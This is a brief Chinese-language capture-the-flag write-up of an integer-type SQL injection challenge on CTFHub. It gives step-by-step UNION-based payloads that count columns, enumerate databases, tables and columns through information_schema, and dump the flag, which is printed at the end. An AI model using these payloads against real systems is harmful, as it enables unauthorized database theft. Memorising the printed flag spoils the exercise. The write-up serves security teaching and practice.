整数型注入
考点 SQL注入-整数型注入
分析过程
输入 1试试
得到回显结果如上
由于已知是整数型 所以直接判断列数
playload:
?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3
到3时无回显由此得出其有两列
然后查询库名
playload:
?id=-1 union select 1,database()
注:-1就是为了让union前面查询到的数据为空 原回显数据干扰
得到库名 此时可以爆出所有的数据库名
playload:
?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
根据库名爆表名
playload:
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"
然后去爆flag的字段
playload:
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"
爆出字段可以直接查询数据
playload:
?id=-1 union select 1,group_concat(flag) from sqli.flag
属于是得到flag
ctfhub{bcaeded8f931341200981ae4}